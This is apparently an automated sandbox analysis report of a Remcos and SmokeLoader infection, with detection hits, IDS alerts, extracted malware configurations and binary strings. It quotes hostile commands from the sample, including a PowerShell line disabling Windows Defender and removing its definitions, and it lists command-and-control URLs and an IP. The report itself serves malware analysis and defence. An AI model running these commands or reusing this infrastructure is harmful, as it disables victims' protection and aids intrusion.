Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, CommandLine: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2116, ParentProcessName: cmd.exe, ProcessCommandLine: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, ProcessId: 4928, ProcessName: powershell.exe

                        HIPS / PFW / Operating System Protection Evasion

                        Source: Process started, Author: Joe Security: Data: Command: findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe" , CommandLine: findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /k move Hwy Hwy.cmd & Hwy.cmd & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6800, ParentProcessName: cmd.exe, ProcessCommandLine: findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe" , ProcessId: 7136, ProcessName: findstr.exe

                        Stealing of Sensitive Information

                        Source: Registry Key set, Author: Joe Security: Data: Details: 9B 4F 24 99 8D 57 CF 27 E2 61 C8 D5 53 E5 08 57 BF AD 46 E0 E1 EA 8C 96 33 37 76 F3 3C F0 0C 0D 57 60 81 F9 15 B2 90 A2 89 E7 5E 37 03 4C 22 15 6F D2 AE 6D 86 30 BB 10 90 8D E7 6A D7 DD 03 D1 D9 EA 65 A1 7C D5 9E 11 2A 5B 54 FE F6 D4 EC 42 19 18 B6 18 40 BF 59 39 06 D0 16 77 21 3E 15 68 EA FC 97 DC 20 1C 32 A3 DD 8B 76 61 86 BE 5B 4B 9A F3 7C 70 3E C6 96 FC C3 69 DD DC 7F E2 CF 59 F8 29 EE D2 E9 62 4E 7F 6C 50 DF E6 6A E7 DB 4E 0D A5 EF F3 69 C6 C0 8C 7E 69 BC C6 3E B8 , EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe, ProcessId: 6948, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-ZZZU66\exepath
                        Snort IDS alerts (all nine hits are the same rule, SID 2039103, on outbound TCP port 80 from the sandbox host):

                        Timestamp                 SID      Source Port  Destination Port  Protocol  Classtype
                        05/08/24-16:41:19.549710  2039103  49744        80                TCP       A Network Trojan was detected
                        05/08/24-16:41:22.482663  2039103  49747        80                TCP       A Network Trojan was detected
                        05/08/24-16:41:03.912735  2039103  49739        80                TCP       A Network Trojan was detected
                        05/08/24-16:41:06.812550  2039103  49741        80                TCP       A Network Trojan was detected
                        05/08/24-16:41:21.026860  2039103  49745        80                TCP       A Network Trojan was detected
                        05/08/24-16:41:25.414325  2039103  49749        80                TCP       A Network Trojan was detected
                        05/08/24-16:41:05.348624  2039103  49740        80                TCP       A Network Trojan was detected
                        05/08/24-16:41:08.297665  2039103  49742        80                TCP       A Network Trojan was detected
                        05/08/24-16:41:23.944554  2039103  49748        80                TCP       A Network Trojan was detected


                        AV Detection

                        Source: http://geoplugin.net/json.gp/C, URL Reputation: Label: phishing
                        Source: https://2no.co/1gFnW4, Avira URL Cloud: Label: malware
                        Source: https://2no.co/, Avira URL Cloud: Label: malware
                        Source: http://piratia.su/tmp/index.php, Avira URL Cloud: Label: malware
                        Source: http://h-c-v.ru/tmp/index.php, Avira URL Cloud: Label: malware
                        Source: https://2no.co/1gFnW4Zw, Avira URL Cloud: Label: malware
                        Source: 0000003D.00000002.2542712079.000000000068E000.00000004.00000020.00020000.00000000.sdmp, Malware Configuration Extractor: Remcos {"Host:Port:Password": "193.149.176.178:2404:1", "Assigned name": "WindowsUpdateServices", "Connect interval": "1", "Install flag": "Enable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "AppData", "Copy file": "WindowsUpdateServices.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-ZZZU66", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                        Source: 0000000F.00000002.2017513277.00000000008D0000.00000004.00001000.00020000.00000000.sdmp, Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://cellc.org/tmp/index.php", "http://h-c-v.ru/tmp/index.php", "http://icebrasilpr.com/tmp/index.php", "http://piratia-life.ru/tmp/index.php", "http://piratia.su/tmp/index.php"]}
                        Source: Og1SeeXcB2.exe, ReversingLabs: Detection: 18%
                        Source: Yara match, File source: 66.2.WindowsUpdateServices.exe.630000.1.unpack, type: UNPACKEDPE
                        Source: Yara match, File source: 66.2.WindowsUpdateServices.exe.630000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara match, File source: 67.2.iexplore.exe.3300000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match, File source: 66.0.WindowsUpdateServices.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara match, File source: 61.2.bound.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara match, File source: 61.0.bound.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara match, File source: 67.2.iexplore.exe.3300000.0.unpack, type: UNPACKEDPE
                        Source: Yara match, File source: 66.2.WindowsUpdateServices.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara match, File source: 0000003D.00000003.2501512368.00000000006B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match, File source: 00000042.00000002.2546887311.0000000000459000.00000002.00000001.01000000.00000031.sdmp, type: MEMORY
                        Source: Yara match, File source: 0000003D.00000002.2542712079.000000000068E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match, File source: 00000043.00000002.2904070426.00000000036CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match, File source: 0000002E.00000003.2495061783.000001E8E7F87000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match, File source: 00000042.00000003.2544077192.000000000074B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match, File source: 0000003D.00000000.2500248903.0000000000459000.00000002.00000001.01000000.00000030.sdmp, type: MEMORY
                        Source: Yara match, File source: 00000043.00000002.2902843382.0000000003300000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara match, File source: 00000042.00000000.2533901161.0000000000459000.00000002.00000001.01000000.00000031.sdmp, type: MEMORY
                        Source: Yara match, File source: 0000003D.00000002.2539602011.0000000000459000.00000002.00000001.01000000.00000030.sdmp, type: MEMORY
                        Source: Yara match, File source: 0000002E.00000003.2496650937.000001E8E8091000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match, File source: 00000042.00000002.2550012688.0000000000630000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara match, File source: Process Memory Space: DE5A.exe PID: 5632, type: MEMORYSTR
                        Source: Yara match, File source: Process Memory Space: bound.exe PID: 1860, type: MEMORYSTR
                        Source: Yara match, File source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe, type: DROPPED
                        Source: Og1SeeXcB2.exe, Joe Sandbox ML: detected
                        Source: DE5A.exe, 0000002E.00000003.2495061783.000001E8E7F87000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: -----BEGIN PUBLIC KEY-----memstr_3027aa14-7

                        Exploits

                        Source: Yara match, File source: 66.2.WindowsUpdateServices.exe.630000.1.unpack, type: UNPACKEDPE
                        Source: Yara match, File source: 66.2.WindowsUpdateServices.exe.630000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara match, File source: 67.2.iexplore.exe.3300000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match, File source: 66.0.WindowsUpdateServices.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara match, File source: 61.2.bound.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara match, File source: 61.0.bound.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara match, File source: 67.2.iexplore.exe.3300000.0.unpack, type: UNPACKEDPE
                        Source: Yara match, File source: 66.2.WindowsUpdateServices.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara match, File source: 0000003D.00000003.2501512368.00000000006B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match, File source: 00000042.00000002.2546887311.0000000000459000.00000002.00000001.01000000.00000031.sdmp, type: MEMORY
                        Source: Yara match, File source: 0000002E.00000003.2495061783.000001E8E7F87000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match, File source: 00000042.00000003.2544077192.000000000074B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match, File source: 0000003D.00000000.2500248903.0000000000459000.00000002.00000001.01000000.00000030.sdmp, type: MEMORY
                        Source: Yara match, File source: 00000043.00000002.2902843382.0000000003300000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara match, File source: 00000042.00000000.2533901161.0000000000459000.00000002.00000001.01000000.00000031.sdmp, type: MEMORY
                        Source: Yara match, File source: 0000003D.00000002.2539602011.0000000000459000.00000002.00000001.01000000.00000030.sdmp, type: MEMORY
                        Source: Yara match, File source: 0000002E.00000003.2496650937.000001E8E8091000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match, File source: 00000042.00000002.2550012688.0000000000630000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara match, File source: Process Memory Space: DE5A.exe PID: 5632, type: MEMORYSTR
                        Source: Yara match, File source: Process Memory Space: bound.exe PID: 1860, type: MEMORYSTR
                        Source: Yara match, File source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe, type: DROPPED

                        Privilege Escalation

                        Source: C:\Windows\System32\reg.exe, Registry value created: NULL C:\Users\user\AppData\Local\Temp\DE5A.exe
                        Source: C:\Windows\System32\reg.exe, Registry value created: DelegateExecute
                        Source: Og1SeeXcB2.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                        Source: unknown, HTTPS traffic detected: 104.21.79.229:443 -> 192.168.2.4:49731 version: TLS 1.2
                        Source: unknown, HTTPS traffic detected: 65.108.69.93:443 -> 192.168.2.4:49743 version: TLS 1.2
                        Source: Og1SeeXcB2.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2403438900.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2465611078.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: DE5A.exe, 00000015.00000003.2399325096.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2460226793.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: ucrtbase.pdb source: DE5A.exe, 00000016.00000002.2473628005.00007FFE00521000.00000002.00000001.01000000.0000000E.sdmp, DE5A.exe, 0000002E.00000002.2593349908.00007FFDFF1F1000.00000002.00000001.01000000.0000001E.sdmp
                        Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2398989773.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2459894595.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2401360422.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2463605579.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2402204452.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2464706425.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-memory-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2400126816.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2461133186.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2402315166.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2464926673.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2399657698.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2460572839.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2402055879.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2464578938.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: DE5A.exe, 00000016.00000002.2478711544.00007FFE1A4F1000.00000040.00000001.01000000.00000011.sdmp
                        Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2402204452.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2464706425.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2400503433.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2461614650.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2398744659.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2459639883.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-crt-time-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2403881706.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2466175167.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2401474807.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2463811905.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2400375213.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2461439949.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: DE5A.exe, 00000016.00000002.2477766609.00007FFE1A4CC000.00000040.00000001.01000000.00000013.sdmp, DE5A.exe, 0000002E.00000002.2599019605.00007FFE1A52C000.00000040.00000001.01000000.00000023.sdmp
                        Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.13 30 Jan 20243.0.13built on: Mon Feb 5 17:39:09 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_
                        Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2400772483.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2462415733.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-file-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2399228016.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2460126912.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2402055879.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2464578938.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2403881706.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2466175167.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\python312.pdb source: DE5A.exe, 00000016.00000002.2470814485.00007FFDFB7F2000.00000040.00000001.01000000.0000000F.sdmp
                        Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2399541989.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2460460068.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2401360422.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2463605579.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: DE5A.exe, 00000015.00000003.2401237563.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2463409848.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2400375213.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2461439949.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: DE5A.exe, 00000015.00000003.2397605685.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000016.00000002.2479674945.00007FFE1A533000.00000002.00000001.01000000.00000010.sdmp, DE5A.exe, 00000027.00000003.2457880872.000001FEA7813000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 0000002E.00000002.2595982386.00007FFE11573000.00000002.00000001.01000000.00000020.sdmp
                        Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: DE5A.exe, 00000015.00000003.2400027903.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2461011324.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-string-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2401013743.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2462996367.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-crt-string-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2403783191.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2466040313.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: DE5A.exe, 00000015.00000003.2400644859.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2461857558.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-debug-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2398989773.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2459894595.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2399908877.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2460830926.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-localization-l1-2-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2400027903.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2461011324.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2400256199.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2461293936.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: DE5A.exe, 00000016.00000002.2475941102.00007FFE1A481000.00000040.00000001.01000000.00000018.sdmp, DE5A.exe, 0000002E.00000002.2598135360.00007FFE1A481000.00000040.00000001.01000000.00000028.sdmp
                        Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2400892291.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2462814169.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-console-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2398744659.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2459639883.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2403306598.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2465418399.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2403984086.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2466348879.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-synch-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2401138877.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2463261633.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2399777885.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2460682343.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2400892291.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2462814169.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\libssl-3.pdb source: DE5A.exe, DE5A.exe, 00000016.00000002.2471761427.00007FFDFF2C4000.00000040.00000001.01000000.0000001B.sdmp, DE5A.exe, 0000002E.00000002.2594679915.00007FFE00524000.00000040.00000001.01000000.0000002B.sdmp
                        Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2402315166.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2464926673.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2403783191.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2466040313.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: DE5A.exe, 00000016.00000002.2474470989.00007FFE115A1000.00000040.00000001.01000000.00000019.sdmp
